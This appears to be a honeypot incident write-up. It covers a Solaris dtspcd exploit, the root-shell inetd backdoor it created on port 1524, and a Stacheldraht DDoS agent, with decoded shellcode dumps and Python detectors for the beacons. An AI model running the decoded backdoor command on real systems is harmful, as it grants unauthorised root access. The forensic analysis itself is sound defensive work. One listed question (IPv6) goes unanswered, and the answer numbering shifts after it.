Contents
Summary
Questions
  - What is the operating system of the honeypot? How did you determine that? (see day1)
  - How did the attacker(s) break into the system? (see day1)
  - Which systems were used in this attack, and how? (see day1)
  - Create a diagram that demonstrates the sequences involved in the attack. (see day1)
  - What is the purpose/reason of the ICMP packets with 'skillz' in them? (see day1)
  - Following the attack, the attacker(s) enabled a unique protocol that one would not expect to find on an IPv4 network. Can you identify that protocol and why it was used?
  - Can you identify the nationality of the attacker? (see day3)
Links and further reading
Summary:
On 29 November a Solaris 8 (SunOS 5.8) honeypot was attacked.
The attacker found a known vulnerability in dtspcd (the CDE Subprocess Control daemon, TCP port 6112) and used a widely available exploit for it. After gaining a root shell (interactive access with root privileges) he configured the machine both as an IRC proxy (psyBNC) for himself and his friends and as an agent in a complex DDoS network (Stacheldraht).
The attacker, presumably Italian and using interbusiness.it (part of Telecom Italia) as his ISP, then actively used the machine both to mask his identity on IRC (a chat network) and to attack another host, javairc.tiscali.it (a chat server for the Tiscali ISP).
For more information about how the attack progressed, view this series of diagrams / data captures.
Q1. What is the operating system of the honeypot? How did you determine that? (see day1)
From the log files supplied for review, a safe deduction can be made that the honeypot is running Solaris 8 (SunOS 5.8) on a SPARC box (a Sun Ultra 5/10).
Many things point to this OS / architecture, including the following.
The Snort alert on the exploit traffic to dtspcd (TCP port 6112). The repeated 80 1C 40 11 words are the SPARC instruction xor %l1,%l1,%g0, which writes only to the hard-wired zero register and therefore does nothing; exploit writers use it instead of the real nop as sled filler, and an attacker only sends SPARC shellcode when he believes the target is a SPARC box. The destination MAC 8:0:20:D1:76:19 also starts with 08:00:20, Sun Microsystems' OUI:

[**] SHELLCODE sparc NOOP [**]
11/29-16:36:26.503382 0:7:EC:B2:D0:A -> 8:0:20:D1:76:19 type:0x800 len:0x5EA
61.219.90.180:56711 -> 192.168.100.28:6112 TCP TTL:44 TOS:0x0 ID:61373 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x7FC1DB88  Ack: 0xBA41EB06  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 48510034 113867474
30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30  0000000204103e00
30 33 20 20 34 20 00 00 00 31 30 00 80 1C 40 11  03  4 ...10...@.
80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11  ..@.......@...@.
80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11  ..@...@...@...@.
The definitive answer comes from the command the exploit runs through the backdoor it has just created (ls checks for a core dump or log left by the overflow, and the ps -fed|grep ' -s /tmp/x' pipe looks up the PID of the backdoor inetd): uname reports SunOS 5.8 on a sun4u SPARC, hostname zoberius, an Ultra 5/10.

# uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 1773

The kernel's own boot message in the syslog data agrees on the hardware:

<6>Dec 1 17:11:55 rootnex: [ID 466748 kern.info] root nexus = Sun Ultra 5/10 UPA PCI (Ultra SPARC-IIi 360MHz)

And the rootkit installation script the attacker ran checks that it is on SunOS before it proceeds:

echo "${WHI}*${DWHI} ${RED} Oops.. im DUMB! i tried installing SunOS Rootkit on $OS :P" # Ok.. so if theyre not lame, and running this on SunOS like they should...
Q2. How did the attacker(s) break into the system? (see day1)
The attacker can be seen connecting to the vulnerable dtspcd daemon (the CDE Subprocess Control daemon, TCP port 6112) in frame 576; the hole is the well-known dtspcd buffer overflow (CERT CA-2002-01, CVE-2001-0803). The actual exploit code can be seen in frame 580. The 82 10 20 0b 91 d0 20 08 bytes at the top of the dump are the end of the SPARC shellcode: mov 11,%g1 ; ta 8 is the Solaris exec(2) system-call trap, and the string that follows is its argument list.
0530  ff ec 82 10 20 0b 91 d0 20 08 2f 62 69 6e 2f 6b   .... ... ./bin/k
0540  73 68 20 20 20 20 2d 63 20 20 65 63 68 6f 20 22   sh    -c  echo "
0550  69 6e 67 72 65 73 6c 6f 63 6b 20 73 74 72 65 61   ingreslo ck strea
0560  6d 20 74 63 70 20 6e 6f 77 61 69 74 20 72 6f 6f   m tcp no wait roo
0570  74 20 2f 62 69 6e 2f 73 68 20 73 68 20 2d 69 22   t /bin/s h sh -i"
0580  3e 2f 74 6d 70 2f 78 3b 2f 75 73 72 2f 73 62 69   >/tmp/x; /usr/sbi
0590  6e 2f 69 6e 65 74 64 20 2d 73 20 2f 74 6d 70 2f   n/inetd  -s /tmp/
05a0  78 3b 73 6c 65 65 70 20 31 30 3b 2f 62 69 6e 2f   x;sleep  10;/bin/
05b0  72 6d 20 2d 66 20 2f 74 6d 70 2f 78 20 41 41 41   rm -f /t mp/x AAA
This code can be cleaned up to be read as...

/bin/ksh -c 'echo "ingreslock stream tcp nowait root /bin/sh sh -i" > /tmp/x; /usr/sbin/inetd -s /tmp/x; sleep 10; /bin/rm -f /tmp/x'

(The runs of spaces in the dump are where the shellcode writes NUL bytes at run time to split the string into separate argv entries, so everything after -c reaches ksh as one argument; the trailing AAA is filler.)
This creates a root shell backdoor on TCP port 1524: the echo writes a one-line inetd configuration file, /usr/sbin/inetd -s /tmp/x starts a second, stand-alone inetd with that file as its configuration, and the line tells it to run /bin/sh -i as root for every connection to the ingreslock service, which /etc/services maps to 1524/tcp. After ten seconds the configuration file is deleted to hide the evidence, but the extra inetd keeps listening; it is the "BD PID" (1773) that the exploit's ps -fed|grep ' -s /tmp/x' check reports, and the attacker then connects to port 1524 to get his root shell.
For a list of commands executed refer to the series of diagrams / data captures.
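As an added example, not code from the original write-up nor from the exploit or rootkit it describes, the following Python recovers the raw bytes from the two hex dumps quoted on this page (the Snort "sparc NOOP" alert under Q1 and frame 580 above), flags the SPARC filler word 80 1C 40 11 and the mov 11,%g1 ; ta 8 exec trap, and decodes the inetd line into the service, port, account and program the backdoor runs. The dump strings are constructed copies of the page's excerpts, and the /etc/services subset is the standard assignment (ingreslock is 1524/tcp).

```python
# Added example (not part of the original write-up or of the exploit it
# describes): parse the hex dumps quoted on the page, flag the SPARC/Solaris
# shellcode markers and describe the inetd backdoor the payload installs.
import re

# Constructed copy of the Ethereal-style dump of frame 580 (offset, bytes, ASCII).
FRAME_580_HEXDUMP = """\
0530  ff ec 82 10 20 0b 91 d0 20 08 2f 62 69 6e 2f 6b   .... ... ./bin/k
0540  73 68 20 20 20 20 2d 63 20 20 65 63 68 6f 20 22   sh    -c  echo "
0550  69 6e 67 72 65 73 6c 6f 63 6b 20 73 74 72 65 61   ingreslo ck strea
0560  6d 20 74 63 70 20 6e 6f 77 61 69 74 20 72 6f 6f   m tcp no wait roo
0570  74 20 2f 62 69 6e 2f 73 68 20 73 68 20 2d 69 22   t /bin/s h sh -i"
0580  3e 2f 74 6d 70 2f 78 3b 2f 75 73 72 2f 73 62 69   >/tmp/x; /usr/sbi
0590  6e 2f 69 6e 65 74 64 20 2d 73 20 2f 74 6d 70 2f   n/inetd  -s /tmp/
05a0  78 3b 73 6c 65 65 70 20 31 30 3b 2f 62 69 6e 2f   x;sleep  10;/bin/
05b0  72 6d 20 2d 66 20 2f 74 6d 70 2f 78 20 41 41 41   rm -f /t mp/x AAA
"""

# Constructed copy of the Snort-style dump (no offset column) from the NOOP alert.
SNORT_ALERT_HEXDUMP = """\
30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30  0000000204103e00
30 33 20 20 34 20 00 00 00 31 30 00 80 1C 40 11  03  4 ...10...@.
80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11  ..@.......@...@.
80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11  ..@...@...@...@.
"""

HEX_LINE = re.compile(
    r"^\s*(?:[0-9a-fA-F]{4}\s+)?"            # optional offset column
    r"((?:[0-9a-fA-F]{2} )*[0-9a-fA-F]{2})"   # single-space separated byte column
    r"(?=\s{2,}|\s*$)")                        # ASCII column follows after 2+ spaces


def parse_hexdump(text):
    """Turn 'offset  xx xx ..  ascii' or Snort's 'xx xx ..  ascii' lines back into bytes."""
    data = bytearray()
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if m:
            data += bytes.fromhex(m.group(1))
    return bytes(data)


# SPARC instruction words that give the payload away.
SPARC_NOP_FILLER = bytes.fromhex("801c4011")          # xor %l1,%l1,%g0: writes %g0, i.e. a NOP
SPARC_NOP_SLED = SPARC_NOP_FILLER * 4                 # the run the Snort "sparc NOOP" rule matches
SOLARIS_EXEC = bytes.fromhex("8210200b91d02008")      # mov 11,%g1 ; ta 8 -> Solaris exec(2) trap

# Subset of the standard /etc/services assignments, used to resolve the backdoor port.
SERVICES = {"ingreslock": 1524, "telnet": 23, "exec": 512, "login": 513, "shell": 514}

INETD_LINE = re.compile(r'echo\s+"([^"]+)"\s*>\s*([^\s;]+)')


def analyse_payload(data):
    """Classify a payload and, if it carries the inetd trick, describe the backdoor."""
    result = {
        "nop_filler_count": data.count(SPARC_NOP_FILLER),
        "sparc_nop_sled": SPARC_NOP_SLED in data,
        "solaris_exec": SOLARIS_EXEC in data,
        "command": None,
        "backdoor": None,
    }
    idx = data.find(SOLARIS_EXEC)
    if idx < 0:
        return result
    # The command string follows the exec trap. The shellcode NUL-terminates the
    # space-padded argv pieces at run time; here we just collapse the padding and
    # drop the trailing 'AAA' filler.
    text = data[idx + len(SOLARIS_EXEC):].decode("ascii", errors="replace").rstrip("A")
    result["command"] = re.sub(r" {2,}", " ", text).strip()
    m = INETD_LINE.search(text)
    if m:
        fields = m.group(1).split()          # inetd.conf: service type proto wait user server args
        if len(fields) >= 6:
            service, socktype, proto, wait, user, server = fields[:6]
            result["backdoor"] = {
                "config_file": m.group(2),
                "service": service,
                "port": SERVICES.get(service),
                "socket": f"{socktype}/{proto}",
                "wait": wait,
                "runs_as": user,
                "server": server,
                "args": fields[6:],
            }
    return result


if __name__ == "__main__":
    for name, dump in (("frame 580", FRAME_580_HEXDUMP), ("snort alert", SNORT_ALERT_HEXDUMP)):
        print(name, analyse_payload(parse_hexdump(dump)))
```

Run against the frame 580 excerpt it reports the exec trap, the cleaned-up command and a backdoor on ingreslock (1524/tcp) running /bin/sh as root; run against the Snort excerpt it finds eight copies of the filler word, including the run of four that the NOOP signature keys on, and no command.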
Q3. Which systems were used in this attack, and how? (see day1)
From the logs given, a safe assumption can be made that the attacker is sitting at an MS Windows XP Professional box connected via ADSL to the Italian ISP interbusiness.it. He also has remote shells on numerous Linux boxes.
On the third day the attacker connected again from his XP machine to use the psyBNC daemon he installed on day 1. This connection came from another IP in the ISP's pool, further supporting the idea that he has an ADSL account with them.
The first communication seen came from a Linux 2.4 machine on the hinet.net network. It is most likely that this is another hacked box, used to scan and penetrate other hosts. Its passive OS fingerprint:

61.219.90.180 [21 hops away]: Linux 2.4.2 - 2.4.14

This is the box that sent the exploit to the Sun machine, downloaded the rootkit / DDoS client software / psyBNC and patched the machine (for commands executed see appendix).
His desktop computer is a Windows XP Pro machine (80.117.14.44 [16 hops away]). He uses this box to chat and converse on IRC.
On day 3 (presumably) the same box connected with another IP address (80.117.14.222 [16 hops away]).
Another Linux machine (62.101.108.86 [19 hops away]) was used to further abuse the honeypot on day 3 (1 December). It connected to the SSH backdoor and enabled IPv6 on the box.
Q4. Create a diagram that demonstrates the sequences involved in the attack. (see day1)
View this series of diagrams / data captures.
Q5. What is the purpose/reason of the ICMP packets with 'skillz' in them? (see day1)
The attacker installed a DDoS agent on the honeypot; the Snort signatures below identify it as Stacheldraht. The "skillz" packets (example below) are the agent's beacons to its controlling handlers: ICMP echo replies (not requests) carrying the string "skillz" in the data, which tell a handler that this agent is alive and ready to take attack commands. A handler answers with an echo reply carrying "ficken", which is the other signature seen.
The handlers it tries to communicate with are 217.116.38.10 and 61.134.3.11; examples of these can be seen in packets 205 and 206.

620 10065.488930 192.168.100.28 217.116.38.10 ICMP Echo (ping) reply
621 10075.488253 192.168.100.28 61.134.3.11   ICMP Echo (ping) reply

[**] [1:1856:2] DDOS Stacheldraht handler->agent (ficken) [**]
[**] [1:1855:2] DDOS Stacheldraht agent->handler (skillz) [**]
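As an added example, not from the original write-up and not from the Stacheldraht tools themselves, here is a Python detector for the control traffic just described. It builds raw IPv4/ICMP echo replies, parses them back, verifies the ICMP checksum before trusting any field, and flags the identifier/marker pairs that Dittrich's analysis (linked in the appendix) documents and that Snort sids 1855 and 1856 encode: identifier 666 with "skillz" for agent->handler and identifier 667 with "ficken" for handler->agent. The sample packets are constructed with the honeypot and the two handler addresses from the capture; they are not packets from the capture itself.

```python
# Added example (not part of the original write-up): detect Stacheldraht's
# ICMP echo-reply beacons and list the handlers an agent talks to.  The
# id/marker pairs follow Dittrich's Stacheldraht analysis and Snort sids
# 1855/1856; all packets below are constructed for the example.
import socket
import struct


def inet_checksum(data):
    """RFC 1071 ones'-complement checksum; evaluates to 0 over a correctly checksummed block."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_icmp_echo_reply(src, dst, icmp_id, payload, seq=0, ttl=255):
    """Raw IPv4 + ICMP type 0 (echo reply) packet, as a sniffer would hand it to us."""
    icmp = struct.pack("!BBHHH", 0, 0, 0, icmp_id, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, ttl, 1, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + icmp


# (direction, ICMP identifier, payload marker) per Dittrich's analysis / Snort 1855, 1856.
STACHELDRAHT_SIGS = (
    ("agent->handler", 666, b"skillz"),
    ("handler->agent", 667, b"ficken"),
)


def parse_ipv4_icmp(pkt):
    """Return the ICMP fields of an IPv4 packet, or None if it is not well-formed ICMP."""
    if len(pkt) < 28:
        return None
    ver_ihl, _tos, total_len, _id, _frag, ttl, proto, _sum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or proto != 1 or total_len > len(pkt):
        return None
    icmp = pkt[ihl:total_len]
    if len(icmp) < 8 or inet_checksum(icmp) != 0:
        return None                      # truncated or corrupted: do not trust the fields
    itype, code, _csum, icmp_id, seq = struct.unpack("!BBHHH", icmp[:8])
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl,
            "type": itype, "code": code, "id": icmp_id, "seq": seq, "data": icmp[8:]}


def classify_stacheldraht(pkt):
    """An echo reply with a Stacheldraht id and marker -> which side of the C2 it is."""
    p = parse_ipv4_icmp(pkt)
    if p is None or p["type"] != 0:
        return None
    for direction, icmp_id, marker in STACHELDRAHT_SIGS:
        if p["id"] == icmp_id and marker in p["data"]:
            return {"direction": direction, "marker": marker.decode(),
                    "src": p["src"], "dst": p["dst"]}
    return None


def handlers_from_capture(packets):
    """Destinations of agent->handler beacons, i.e. the handler list compiled into the agent."""
    handlers = []
    for pkt in packets:
        hit = classify_stacheldraht(pkt)
        if hit and hit["direction"] == "agent->handler" and hit["dst"] not in handlers:
            handlers.append(hit["dst"])
    return handlers


# Constructed sample "capture": the honeypot beaconing to the two handlers named above,
# one handler answering, and an ordinary ping reply that must not be flagged.
HONEYPOT = "192.168.100.28"
SAMPLE_CAPTURE = [
    build_icmp_echo_reply(HONEYPOT, "217.116.38.10", 666, b"skillz"),
    build_icmp_echo_reply(HONEYPOT, "61.134.3.11", 666, b"skillz"),
    build_icmp_echo_reply("217.116.38.10", HONEYPOT, 667, b"ficken"),
    build_icmp_echo_reply(HONEYPOT, "192.168.100.1", 0x1234, b"abcdefghijklmnop", seq=7),
]

if __name__ == "__main__":
    for pkt in SAMPLE_CAPTURE:
        print(classify_stacheldraht(pkt))
    print("handlers:", handlers_from_capture(SAMPLE_CAPTURE))
```

Matching on identifier and marker together, not on the string alone, is what keeps the rule from firing on an ordinary ping that happens to carry the word, and checking the ICMP checksum first means a damaged or deliberately malformed packet is dropped instead of misclassified.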
Q6. Can you identify the nationality of the attacker? (see day3)
All clues point to the attacker being Italian: the addresses he connects from belong to interbusiness.it, part of Telecom Italia, and the host he attacks from the honeypot, javairc.tiscali.it, is the chat server of the Italian ISP Tiscali.
Appendix, links and further reading
Ethereal: http://www.ethereal.com
Snort: http://www.snort.org
Stacheldraht DDoS analysis (Dittrich): http://staff.washington.edu/dittrich/misc/stacheldraht.analysis
nardware.co.uk: http://www.nardware.co.uk